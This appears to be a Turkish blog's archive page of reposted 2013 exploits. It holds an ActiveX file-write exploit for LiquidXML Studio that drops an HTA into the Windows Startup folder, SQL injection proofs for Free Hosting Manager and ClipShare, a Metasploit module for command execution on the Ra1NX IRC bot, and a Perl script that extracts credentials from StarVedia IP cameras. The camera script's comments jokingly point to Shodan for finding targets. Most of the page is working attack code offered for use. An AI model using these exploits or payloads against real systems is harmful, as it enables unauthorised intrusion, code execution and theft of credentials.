Archive for 25 Mart 2013

LiquidXML Studio 2010 ActiveX Remote 0-day

liquidXML-exploit

 

LiquidXML Studio 2010 ActiveX Remote 0-day Exploit

<html>
<object classid='clsid:E68E401C-7DB0-4F3A-88E1-159882468A79' id='target'/></object>
<script>
var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta";
var king = "Oh noz, Look what Dr_IDE did...<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
target.OpenFile(sofa,1);
target.AppendString(king);
</script>
<body>
LiquidXML Studio 2010 ActiveX Insecure Method Executable File Creation 0-day<br>
By: Dr_IDE<br>
GUID: {E68E401C-7DB0-4F3A-88E1-159882468A79}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
<br>
<br>
<br>
Been sitting on this one so long it could've hatched twice.
</body>
</html>

 

Free Hosting Manager V2.0.2 Multiple SQLi

Free Hosting Manager V2.0.2 Genel SQL injeçtion açığına ilişkin exploit

-------------------------------------------------------------------------
# Software      : Free Hosting Manager V2.0.2    Multiple SQLi                                                                                                          
# Author        : Saadat Ullah , saadi_linux@rocketmail.com                               
# Author home  : http://security-geeks.blogspot.com
# Date          : 23/3/13   
# Vendors  : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php  
                                                                                     
-------------------------------------------------------------------------
 --- [ Multiple SQL injection] --- 
Its is vulnerable to SQLi on many file some of them are..

http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie based injeciton In 
http://localhost/free/clients/home.php
inject the cookie value clientuser
http://localhost/free/clients/register.php --->  SQLi on all POST Fields.

Proof Of Concept
In home.php
Calling a function auth() and what it is 

if ((isset($_COOKIE[&#39;clientuser&#39;])) && isset($_COOKIE[&#39;clientpass&#39;]) && isset($_COOKIE[&#39;clientid&#39;])) {

$clientuser = $_COOKIE[&#39;clientuser&#39;];
$clientpass = $_COOKIE[&#39;clientpass&#39;];
$clientid = $_COOKIE[&#39;clientid&#39;];
$this-> clientuser = $_COOKIE[&#39;clientuser&#39;];
$this-> clientpass = $_COOKIE[&#39;clientpass&#39;];
$this-> clientid = $_COOKIE[&#39;clientid&#39;];
return true;

$dbquery = @mysql_query("SELECT * FROM clients WHERE id=&#39;$clientid&#39; AND username=&#39;$clientuser&#39; AND password=&#39;$clientpass&#39;") or die(mysql_error());


In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]

elseif ((isset($code)) || ($_GET[&#39;do&#39;] == "code")) {

$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode=&#39;$code&#39;") 
or die(mysql_error());

In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET[&#39;id&#39;])) && ($_GET[&#39;action&#39;] == "close") && ($_GET[&#39;confirm&#39;] == "true")) {
$fhm-> closeticket($_GET[&#39;id&#39;]);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id=&#39;$ticket&#39; AND clientid=&#39;$this-> clientid&#39;") or die(mysql_error());

In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]

$id = $_GET[&#39;id&#39;];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id=&#39;$id&#39; AND clientid=&#39;$fhm-> clientid&#39;") or die(mysql_error());

In register.php

$firstname = stripslashes($_POST[&#39;first_name&#39;]);
$lastname = stripslashes($_POST[&#39;last_name&#39;]);
$company = stripslashes($_POST[&#39;company&#39;]);
$address = stripslashes($_POST[&#39;address&#39;]);
$address2 = stripslashes($_POST[&#39;address_2&#39;]);
$country = stripslashes($_POST[&#39;country&#39;]);
$city = stripslashes($_POST[&#39;city&#39;]);
$state = stripslashes($_POST[&#39;state_region&#39;]);
$postcode = stripslashes($_POST[&#39;postal_code&#39;]);
$telnumber = stripslashes($_POST[&#39;tel_number&#39;]);
$faxnumber = stripslashes($_POST[&#39;fax_number&#39;]);
$emailaddress = stripslashes($_POST[&#39;email_address&#39;]);
$username = stripslashes($_POST[&#39;username&#39;]);
$password1 = stripslashes($_POST[&#39;password&#39;]);
$password2 = stripslashes($_POST[&#39;confirm_password&#39;]);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES(&#39;&#39;, &#39;$username&#39;, &#39;$md5pass&#39;, &#39;$firstname&#39;, &#39;$lastname&#39;, &#39;$company&#39;, &#39;$address&#39;, &#39;$address2&#39;, &#39;$city&#39;, &#39;$country&#39;, &#39;$state&#39;, &#39;$postcode&#39;, &#39;$telnumber&#39;, &#39;$faxnumber&#39;, &#39;$emailaddress&#39;, &#39;$startingcredits&#39;, &#39;1&#39;, &#39;&#39;, &#39;&#39;, &#39;$timestamp&#39;) ") 

Only using stripslahes which will not protect against doing sql injection attack.

#independent Pakistani Security Researcher


  

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection Vulnerability

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection açığına ilişkin exploit

# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Note : this vulnerable work just if there is a group added to the community 
#Last Checked: 24 March 2013

#to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)

==============================================================================================

#Vulnerable Script:
PHP script : members.php  on line 23 

=========================== BEGIN OF gmembers.php =============================================

 <?php
/************************************************************************************************
| Software Name        : ClipShare - Video Sharing Community Script
| Software Author      : Clip-Share.Com / ScriptXperts.Com
| Website              : http://www.clip-share.com
| E-mail               : office@clip-share.com
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

require(&#39;include/config.php&#39;);
require(&#39;include/function.php&#39;);
require(&#39;classes/pagination.class.php&#39;);
require(&#39;language/&#39; .$_SESSION&#91;&#39;language&#39;&#93;. &#39;/gmembers.lang.php&#39;);

$gname  = NULL;
$gurl   = NULL;
$oid    = NULL;
$gid    = ( isset($_REQUEST&#91;&#39;gid&#39;&#93;) && is_numeric($_REQUEST&#91;&#39;gid&#39;&#93;) ) ? mysql_real_escape_string($_REQUEST&#91;&#39;gid&#39;&#93;) : NULL;
$sql    = "SELECT * FROM group_own WHERE GID=&#39;" .$gid. "&#39; limit 1";
$rs     = $conn-> execute($sql);
if ( $conn-> Affected_Rows() == 1 ) {
    $urlkey     = $rs-> fields[&#39;gurl&#39;];
    $gname      = $rs-> fields[&#39;gname&#39;];
    $gupload    = $rs-> fields[&#39;gupload&#39;];
    $oid        = $rs-> fields[&#39;OID&#39;];
    STemplate::assign(&#39;gname&#39;, $gname);
    STemplate::assign(&#39;gurl&#39;, $urlkey);
    STemplate::assign(&#39;gupload&#39;, $gupload);
} else {
    session_write_close();
    header(&#39;Location: &#39; .$config[&#39;BASE_URL&#39;]. &#39;/error.php?type=group_missing&#39;);
    die();
}
...........................................;
...............................................
 
?> 

============================================================================================================


 
Poc :

http://server/mavideo/gmembers.php?gid=6 [Blind SQLi]

Real exploitation :

 http://server/mavideo/gmembers.php?gid=6 AND 1=1
==>  return normal page

http://server/mavideo/gmembers.php?gid=6 AND 1=2
==>  return page with some errors ( or with nothing - white page )



--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team

./Esac

“Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Uzaktan Kod Çalıştırma Açığı

# Exploit Title: &quot;Ra1NX&quot; PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require &amp;#39;msf/core&amp;#39;

class Metasploit3  &lt; Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			&amp;#39;Name&amp;#39;           =&gt;  &amp;#39;&quot;Ra1NX&quot; PHP Bot pubcall Authentication Bypass Remote Code Execution&amp;#39;,
			&amp;#39;Description&amp;#39;    =&gt;  %q{
					This module allows remote command execution on the PHP IRC bot Ra1NX by
					using the public call feature in private message to covertly bypass the
					authentication system.
				},
			&amp;#39;Author&amp;#39;         =&gt; 
				[
					&amp;#39;bwall  &lt;bwall[at]openbwall.com&gt; &amp;#39; # Ra1NX analysis and Metasploit module
				],
			&amp;#39;License&amp;#39;        =&gt;  MSF_LICENSE,
			&amp;#39;References&amp;#39;     =&gt; 
				[
					[&amp;#39;URL&amp;#39;, &amp;#39;https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot&amp;#39;],
					[&amp;#39;URL&amp;#39;, &amp;#39;https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0&amp;#39;],
					[&amp;#39;URL&amp;#39;, &amp;#39;http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b&amp;#39;]
				],
			&amp;#39;Platform&amp;#39;       =&gt;  [ &amp;#39;unix&amp;#39;, &amp;#39;win&amp;#39;],
			&amp;#39;Arch&amp;#39;           =&gt;  ARCH_CMD,
			&amp;#39;Payload&amp;#39;        =&gt; 
				{
					&amp;#39;Space&amp;#39;    =&gt;  344,
					&amp;#39;BadChars&amp;#39; =&gt;  &amp;#39;&amp;#39;,
					&amp;#39;DisableNops&amp;#39; =&gt;  true,
					&amp;#39;Compat&amp;#39;      =&gt; 
						{
							&amp;#39;PayloadType&amp;#39; =&gt;  &amp;#39;cmd&amp;#39;,
						}
				},
			&amp;#39;Targets&amp;#39;  =&gt; 
				[
					[ &amp;#39;Ra1NX&amp;#39;, { } ]
				],
			&amp;#39;Privileged&amp;#39;     =&gt;  false,
			&amp;#39;DisclosureDate&amp;#39; =&gt;  &amp;#39;March 24 2013&amp;#39;,
			&amp;#39;DefaultTarget&amp;#39;  =&gt;  0))

		register_options(
			[
				Opt::RPORT(6667),
				OptString.new(&amp;#39;IRC_PASSWORD&amp;#39;, [false, &amp;#39;IRC Connection Password&amp;#39;, &amp;#39;&amp;#39;]),
				OptString.new(&amp;#39;NICK&amp;#39;, [true, &amp;#39;IRC Nickname&amp;#39;, &amp;#39;msf_user&amp;#39;]),
				OptString.new(&amp;#39;RNICK&amp;#39;, [true, &amp;#39;Nickname of Target IRC Bot&amp;#39;, &amp;#39;jhl1&amp;#39;]),
				OptString.new(&amp;#39;PHP_EXEC&amp;#39;, [true, &amp;#39;Function used to call payload&amp;#39;, &amp;#39;system&amp;#39;])
			], self.class)
	end

	def check
		connect

		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error(&quot;#{rhost}:#{rport} - Connection to the IRC Server not allowed&quot;)
			return Exploit::CheckCode::Unknown
		end
		confirm_string = rand_text_alpha(8)
		response = send_msg(sock, &quot;PRIVMSG #{datastore[&amp;#39;RNICK&amp;#39;]} :#{datastore[&amp;#39;RNICK&amp;#39;]} @msg #{datastore[&amp;#39;NICK&amp;#39;]} #{confirm_string}rn&quot;)
		print response
		quit(sock)
		disconnect

		if response =~ /#{confirm_string}/
			return Exploit::CheckCode::Vulnerable
		else
			return Exploit::CheckCode::Safe
		end
	end

	def send_msg(sock, data)
		sock.put(data)
		data = &quot;&quot;
		begin
			read_data = sock.get_once(-1, 1)
			while not read_data.nil?
				data  &lt; &lt; read_data
				read_data = sock.get_once(-1, 1)
			end
		rescue EOFError
		end
		data
	end

	def register(sock)
		msg = &quot;&quot;

		if datastore[&amp;#39;IRC_PASSWORD&amp;#39;] and not datastore[&amp;#39;IRC_PASSWORD&amp;#39;].empty?
			msg  &lt; &lt; &quot;PASS #{datastore[&amp;#39;IRC_PASSWORD&amp;#39;]}rn&quot;
		end

		if datastore[&amp;#39;NICK&amp;#39;].length &gt;  9
			nick = rand_text_alpha(9)
			print_error(&quot;The nick is longer than 9 characters, using #{nick}&quot;)
		else
			nick = datastore[&amp;#39;NICK&amp;#39;]
		end

		msg  &lt; &lt; &quot;NICK #{nick}rn&quot;
		msg  &lt; &lt; &quot;USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn&quot;

		response = send_msg(sock,msg)
		return response
	end

	def ra1nx_command(sock)
		encoded = payload.encoded
		command_msg = &quot;PRIVMSG #{datastore[&amp;#39;RNICK&amp;#39;]} :#{datastore[&amp;#39;RNICK&amp;#39;]} @#{datastore[&amp;#39;PHP_EXEC&amp;#39;]} #{encoded}rn&quot;
		response = send_msg(sock, command_msg)
		return response
	end

	def quit(sock)
		quit_msg = &quot;QUIT :bye byern&quot;
		sock.put(quit_msg)
	end

	def exploit
		connect

		print_status(&quot;#{rhost}:#{rport} - Registering with the IRC Server...&quot;)
		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error(&quot;#{rhost}:#{rport} - Connection to the IRC Server not allowed&quot;)
			return
		end

		print_status(&quot;#{rhost}:#{rport} - Exploiting the Ra1NX bot...&quot;)
		ra1nx_command(sock)

		quit(sock)
		disconnect
	end
end

StarVedia IPCamera IC502w IC502w v020313 – Username/Password Disclosure

StarVedia IPCamera IC502w IC502w v020313 – Username/Password Disclosure Açığına ilişkin perl exploit aşağıdaki gibidir.

#!/usr/bin/perl
#
#  [ ] StarVedia IPCamera IC502w IC502w  v020313 remote bypass username/password disclosure exploit
#  Author: Todor Donev
#  Email: todor.donev at gmail dot com
#  Type: Hardware
#
#  Thanks to Tsvetelina Emirska the best friend in my life 
#  and all my other friends for the help and support which 
#  gives me. Kind regards to all of you, who read my lil&#39; 
#  exploits.
#  Bulgaria, Sofia
#  03.2013
#
#  Shodanhq r0x 4 teh lulz!!
#  http://www.youtube.com/watch?v=qNyN1AY-YZQ  Cheeerzz =))
#
#  Another bug, hint: you can edit this code and add some lines for remote change the password.
#####

use LWP::Simple;
if (@ARGV == 0) {&usg;}
while (@ARGV >  0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
}
if ($type eq "-d") {
my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulneruble, $!n");
print " [ ] StarVedia IPCamera IC502w IC502w  v020313 remote bypass username/password disclosure exploitn";
print " [!] Exploiting: $tn";
if ($r =~ m/ <INPUT type=text name=user size=20 maxlength=19 value="(.*)"> /g) {
$result .= "   [o] User: $1n";
}else{die(" Try another exploit, $!");}     
if ($r =~ m/ <INPUT type=password name=passwd size=20 maxlength=19 value="(.*)"> /g){
$result .= "   [o] Password: $1n";
}else{die("Try another exploit or restart the exploitn");}
sleep(1);
print " [m/] BINGO!!!na".$result; 
}
sub usg(){
print " [!] usg: perl $0 [-r or -d]  <victim:port> n";
print " [!]  -d: disclosure password optionn";
print " [!] exp: perl $0 -d 127.0.0.1 :)n";
exit;
}